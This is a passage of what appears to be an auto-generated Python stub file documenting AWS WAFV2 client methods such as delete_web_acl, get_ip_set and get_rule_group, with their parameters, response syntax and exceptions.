:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFAssociatedItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
"""
pass
def delete_logging_configuration(ResourceArn=None):
"""
Deletes the LoggingConfiguration from the specified web ACL.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_logging_configuration(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the web ACL from which you want to delete the LoggingConfiguration .\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def delete_permission_policy(ResourceArn=None):
"""
Permanently deletes an IAM policy from the specified rule group.
You must be the owner of the rule group to perform this operation.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_permission_policy(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the rule group from which you want to delete the policy.\nYou must be the owner of the rule group to perform this operation.\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
:return: {}
:returns:
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
"""
pass
def delete_regex_pattern_set(Name=None, Scope=None, Id=None, LockToken=None):
"""
Deletes the specified RegexPatternSet .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_regex_pattern_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the set. You cannot change the name after you create the set.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFAssociatedItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
"""
pass
def delete_rule_group(Name=None, Scope=None, Id=None, LockToken=None):
"""
Deletes the specified RuleGroup .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_rule_group(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the rule group. You cannot change the name of a rule group after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the rule group. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFAssociatedItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
"""
pass
def delete_web_acl(Name=None, Scope=None, Id=None, LockToken=None):
"""
Deletes the specified WebACL .
You can only use this if ManagedByFirewallManager is false in the specified WebACL .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_web_acl(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the Web ACL. You cannot change the name of a Web ACL after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nThe unique identifier for the Web ACL. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFAssociatedItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
"""
pass
def describe_managed_rule_group(VendorName=None, Name=None, Scope=None):
"""
Provides high-level information for a managed rule group, including descriptions of the rules.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_managed_rule_group(
VendorName='string',
Name='string',
Scope='CLOUDFRONT'|'REGIONAL'
)
:type VendorName: string
:param VendorName: [REQUIRED]\nThe name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.\n
:type Name: string
:param Name: [REQUIRED]\nThe name of the managed rule group. You use this, along with the vendor name, to identify the rule group.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Capacity': 123,
'Rules': [
{
'Name': 'string',
'Action': {
'Block': {},
'Allow': {},
'Count': {}
}
},
]
}
Response Structure
(dict) --
Capacity (integer) --
The web ACL capacity units (WCUs) required for this rule group. AWS WAF uses web ACL capacity units (WCU) to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. AWS WAF calculates capacity differently for each rule type, to reflect each rule\'s relative cost. Rule group capacity is fixed at creation, so users can plan their web ACL WCU usage when they use a rule group. The WCU limit for web ACLs is 1,500.
Rules (list) --
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
High-level information about a Rule , returned by operations like DescribeManagedRuleGroup . This provides information like the ID, that you can use to retrieve and manage a RuleGroup , and the ARN, that you provide to the RuleGroupReferenceStatement to use the rule group in a Rule .
Name (string) --
The name of the rule.
Action (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The action that AWS WAF should take on a web request when it matches a rule\'s statement. Settings at the web ACL level can override the rule action setting.
Block (dict) --
Instructs AWS WAF to block the web request.
Allow (dict) --
Instructs AWS WAF to allow the web request.
Count (dict) --
Instructs AWS WAF to count the web request and allow it.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'Capacity': 123,
'Rules': [
{
'Name': 'string',
'Action': {
'Block': {},
'Allow': {},
'Count': {}
}
},
]
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def disassociate_web_acl(ResourceArn=None):
"""
Disassociates a Web ACL from a regional application resource. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.
For AWS CloudFront, don\'t use this call. Instead, use your CloudFront distribution configuration. To disassociate a Web ACL, provide an empty web ACL ID in the CloudFront call UpdateDistribution . For information, see UpdateDistribution .
See also: AWS API Documentation
Exceptions
:example: response = client.disassociate_web_acl(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource to disassociate from the web ACL.\nThe ARN must be in one of the following formats:\n\nFor an Application Load Balancer: ``arn:aws:elasticloadbalancing:region :account-id :loadbalancer/app/load-balancer-name /load-balancer-id ``\nFor an Amazon API Gateway stage: ``arn:aws:apigateway:region ::/restapis/api-id /stages/stage-name ``\n\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_ip_set(Name=None, Scope=None, Id=None):
"""
Retrieves the specified IPSet .
See also: AWS API Documentation
Exceptions
:example: response = client.get_ip_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the IP set. You cannot change the name of an IPSet after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:rtype: dict
ReturnsResponse Syntax
{
'IPSet': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'Description': 'string',
'IPAddressVersion': 'IPV4'|'IPV6',
'Addresses': [
'string',
]
},
'LockToken': 'string'
}
Response Structure
(dict) --
IPSet (dict) --
Name (string) --
The name of the IP set. You cannot change the name of an IPSet after you create it.
Id (string) --
A unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Description (string) --
A description of the IP set that helps with identification. You cannot change the description of an IP set after you create it.
IPAddressVersion (string) --
Specify IPV4 or IPV6.
Addresses (list) --
Contains an array of strings that specify one or more IP addresses or blocks of IP addresses in Classless Inter-Domain Routing (CIDR) notation. AWS WAF supports all address ranges for IP versions IPv4 and IPv6.
Examples:
To configure AWS WAF to allow, block, or count requests that originated from the IP address 192.0.2.44, specify 192.0.2.44/32 .
To configure AWS WAF to allow, block, or count requests that originated from IP addresses from 192.0.2.0 to 192.0.2.255, specify 192.0.2.0/24 .
To configure AWS WAF to allow, block, or count requests that originated from the IP address 1111:0000:0000:0000:0000:0000:0000:0111, specify 1111:0000:0000:0000:0000:0000:0000:0111/128 .
To configure AWS WAF to allow, block, or count requests that originated from IP addresses 1111:0000:0000:0000:0000:0000:0000:0000 to 1111:0000:0000:0000:ffff:ffff:ffff:ffff, specify 1111:0000:0000:0000:0000:0000:0000:0000/64 .
For more information about CIDR notation, see the Wikipedia entry Classless Inter-Domain Routing .
(string) --
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'IPSet': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'Description': 'string',
'IPAddressVersion': 'IPV4'|'IPV6',
'Addresses': [
'string',
]
},
'LockToken': 'string'
}
:returns:
To configure AWS WAF to allow, block, or count requests that originated from the IP address 192.0.2.44, specify 192.0.2.44/32 .
To configure AWS WAF to allow, block, or count requests that originated from IP addresses from 192.0.2.0 to 192.0.2.255, specify 192.0.2.0/24 .
To configure AWS WAF to allow, block, or count requests that originated from the IP address 1111:0000:0000:0000:0000:0000:0000:0111, specify 1111:0000:0000:0000:0000:0000:0000:0111/128 .
To configure AWS WAF to allow, block, or count requests that originated from IP addresses 1111:0000:0000:0000:0000:0000:0000:0000 to 1111:0000:0000:0000:ffff:ffff:ffff:ffff, specify 1111:0000:0000:0000:0000:0000:0000:0000/64 .
"""
pass
def get_logging_configuration(ResourceArn=None):
"""
Returns the LoggingConfiguration for the specified web ACL.
See also: AWS API Documentation
Exceptions
:example: response = client.get_logging_configuration(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the web ACL for which you want to get the LoggingConfiguration .\n
:rtype: dict
ReturnsResponse Syntax{
'LoggingConfiguration': {
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
}
}
Response Structure
(dict) --
LoggingConfiguration (dict) --The LoggingConfiguration for the specified web ACL.
ResourceArn (string) --The Amazon Resource Name (ARN) of the web ACL that you want to associate with LogDestinationConfigs .
LogDestinationConfigs (list) --The Amazon Kinesis Data Firehose Amazon Resource Name (ARNs) that you want to associate with the web ACL.
(string) --
RedactedFields (list) --The parts of the request that you want to keep out of the logs. For example, if you redact the cookie field, the cookie field in the firehose will be xxx .
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The part of a web request that you want AWS WAF to inspect. Include the single FieldToMatch type that you want to inspect, with additional specifications as needed, according to the type. You specify a single request component in FieldToMatch for each rule statement that requires it. To inspect more than one component of a web request, create a separate rule statement for each component.
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'LoggingConfiguration': {
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
def get_permission_policy(ResourceArn=None):
"""
Returns the IAM policy that is attached to the specified rule group.
You must be the owner of the rule group to perform this operation.
See also: AWS API Documentation
Exceptions
:example: response = client.get_permission_policy(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the rule group for which you want to get the policy.\n
:rtype: dict
ReturnsResponse Syntax{
'Policy': 'string'
}
Response Structure
(dict) --
Policy (string) --The IAM policy that is attached to the specified rule group.
Exceptions
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
:return: {
'Policy': 'string'
}
"""
pass
def get_rate_based_statement_managed_keys(Scope=None, WebACLName=None, WebACLId=None, RuleName=None):
"""
Retrieves the keys that are currently blocked by a rate-based rule. The maximum number of managed keys that can be blocked for a single rate-based rule is 10,000. If more than 10,000 addresses exceed the rate limit, those with the highest rates are blocked.
See also: AWS API Documentation
Exceptions
:example: response = client.get_rate_based_statement_managed_keys(
Scope='CLOUDFRONT'|'REGIONAL',
WebACLName='string',
WebACLId='string',
RuleName='string'
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type WebACLName: string
:param WebACLName: [REQUIRED]\nThe name of the Web ACL. You cannot change the name of a Web ACL after you create it.\n
:type WebACLId: string
:param WebACLId: [REQUIRED]\nThe unique identifier for the Web ACL. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type RuleName: string
:param RuleName: [REQUIRED]\nThe name of the rate-based rule to get the keys for.\n
:rtype: dict
ReturnsResponse Syntax
{
'ManagedKeysIPV4': {
'IPAddressVersion': 'IPV4'|'IPV6',
'Addresses': [
'string',
]
},
'ManagedKeysIPV6': {
'IPAddressVersion': 'IPV4'|'IPV6',
'Addresses': [
'string',
]
}
}
Response Structure
(dict) --
ManagedKeysIPV4 (dict) --
The keys that are of Internet Protocol version 4 (IPv4).
IPAddressVersion (string) --
Addresses (list) --
The IP addresses that are currently blocked.
(string) --
ManagedKeysIPV6 (dict) --
The keys that are of Internet Protocol version 6 (IPv6).
IPAddressVersion (string) --
Addresses (list) --
The IP addresses that are currently blocked.
(string) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'ManagedKeysIPV4': {
'IPAddressVersion': 'IPV4'|'IPV6',
'Addresses': [
'string',
]
},
'ManagedKeysIPV6': {
'IPAddressVersion': 'IPV4'|'IPV6',
'Addresses': [
'string',
]
}
}
:returns:
(string) --
"""
pass
def get_regex_pattern_set(Name=None, Scope=None, Id=None):
"""
Retrieves the specified RegexPatternSet .
See also: AWS API Documentation
Exceptions
:example: response = client.get_regex_pattern_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the set. You cannot change the name after you create the set.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:rtype: dict
ReturnsResponse Syntax
{
'RegexPatternSet': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'Description': 'string',
'RegularExpressionList': [
{
'RegexString': 'string'
},
]
},
'LockToken': 'string'
}
Response Structure
(dict) --
RegexPatternSet (dict) --
Name (string) --
The name of the set. You cannot change the name after you create the set.
Id (string) --
A unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Description (string) --
A description of the set that helps with identification. You cannot change the description of a set after you create it.
RegularExpressionList (list) --
The regular expression patterns in the set.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A single regular expression. This is used in a RegexPatternSet .
RegexString (string) --
The string representing the regular expression.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'RegexPatternSet': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'Description': 'string',
'RegularExpressionList': [
{
'RegexString': 'string'
},
]
},
'LockToken': 'string'
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def get_rule_group(Name=None, Scope=None, Id=None):
"""
Retrieves the specified RuleGroup .
See also: AWS API Documentation
Exceptions
:example: response = client.get_rule_group(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the rule group. You cannot change the name of a rule group after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the rule group. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:rtype: dict
ReturnsResponse Syntax
{
'RuleGroup': {
'Name': 'string',
'Id': 'string',
'Capacity': 123,
'ARN': 'string',
'Description': 'string',
'Rules': [
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
